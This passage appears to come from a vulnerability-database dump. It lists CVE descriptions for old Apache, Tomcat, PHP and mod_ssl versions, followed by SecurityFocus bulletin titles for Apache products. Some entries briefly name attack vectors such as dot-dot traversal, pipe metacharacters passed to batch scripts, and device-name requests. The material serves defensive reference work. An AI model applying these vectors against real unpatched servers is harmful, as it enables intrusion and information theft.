12924| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
12925| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
12926| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
12927| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
12928| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
12929| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
12930| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
12931| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
12932| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
12933| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
12934| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
12935| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
12936| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
12937| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
12938| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
12939| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
12940| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
12941| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
12942| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
12943| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
12944| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
12945| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
12946| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
12947| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
12948| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
12949| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
12950| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
12951| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
12952| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
12953| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
12954| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
12955| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
12956| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
12957| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
12958| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
12959| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
12960| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
12961| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
12962| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
12963| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
12964| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
12965| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
12966| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
12967| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
12968| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
12969| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
12970| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
12971| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
12972| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
12973| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
12974| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
12975| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
12976| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
12977| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
12978| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
12979| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
12980| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
12981| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
12982| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
12983| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
12984| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
12985| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
12986| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
12987| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
12988| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
12989| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
12990| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
12991| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
12992| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
12993| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
12994| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
12995| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
12996| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
12997| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
12998| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
12999| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13000| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13001| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13002| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13003| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13004| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13005| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13006| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13007| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13008| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13009| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13010| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13011| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13012| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13013| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13014| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13015| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13016|
13017| SecurityFocus - https://www.securityfocus.com/bid/:
13018| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13019| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13020| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13021| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13022| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13023| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13024| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13025| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13026| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13027| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13028| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13029| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13030| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13031| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13032| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13033| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13034| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13035| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13036| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13037| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13038| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13039| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13040| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13041| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13042| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13043| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13044| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13045| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13046| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13047| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13048| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13049| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13050| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13051| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13052| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13053| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13054| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13055| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13056| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13057| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13058| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13059| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13060| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13061| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13062| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13063| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13064| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13065| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13066| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13067| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13068| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13069| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13070| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13071| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13072| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13073| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13074| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13075| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13076| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13077| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13078| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13079| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13080| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13081| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13082| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13083| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13084| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13085| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13086| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13087| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13088| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13089| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13090| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13091| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13092| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13093| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13094| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13095| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13096| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13097| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13098| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13099| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13100| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13101| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13102| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
13103| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
13104| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
13105| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
13106| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
13107| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
13108| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
13109| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
13110| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
13111| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
13112| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
13113| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
13114| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
13115| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
13116| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
13117| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
13118| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
13119| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
13120| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
13121| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
13122| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
13123| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
13124| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
13125| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
13126| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
13127| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
13128| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
13129| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
13130| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
13131| [100447] Apache2Triad Multiple Security Vulnerabilities
13132| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
13133| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
13134| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
13135| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
13136| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
13137| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
13138| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
13139| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
13140| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
13141| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
13142| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
13143| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
13144| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
13145| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
13146| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
13147| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
13148| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
13149| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
13150| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
13151| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
13152| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
13153| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
13154| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
13155| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
13156| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
13157| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
13158| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
13159| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
13160| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
13161| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
13162| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
13163| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
13164| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
13165| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
13166| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
13167| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
13168| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
13169| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
13170| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
